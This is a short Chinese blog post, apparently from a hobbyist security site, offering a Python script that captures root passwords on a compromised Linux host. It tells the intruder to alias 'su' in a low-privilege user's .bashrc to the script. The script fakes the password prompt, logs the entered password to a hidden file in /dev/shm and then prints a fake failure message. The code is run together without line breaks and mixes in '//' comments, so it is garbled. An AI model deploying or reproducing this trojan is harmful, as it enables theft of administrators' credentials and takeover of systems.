AZ0NE

AZ0NE

关于我

网络安全爱好者
2015-01-16

记录root密码小工具

 渗透linux拿到低权限并提权无果时,将这个程序传上去,再将一个低权限用户目录下的.bashrc添加一句alias su=’/usr/root.py'; 低权限用户su root 后 成功记录密码。密码记录路径请看脚本

root.py

 #!/usr/bin/pythonimport os, sys, getpass, timecurrent_time = time.strftime("%Y-%m-%d %H:%M")logfile="/dev/shm/.su.log"              //密码获取后记录在这里#CentOS                 #fail_str = "su: incorrect password"#Ubuntu              #fail_str = "su: Authentication failure"#For Linux Korea                    //centos,ubuntu,korea 切换root用户失败提示不一样fail_str = "su: incorrect password"try:passwd = getpass.getpass(prompt='Password: ');file=open(logfile,'a')file.write("[%s]t%s"%(passwd, current_time))   //截取root密码file.write('n')file.close()except:passtime.sleep(1)print fail_str                               //打印切换root失败提示  



 

评论
© AZ0NE | Powered by LOFTER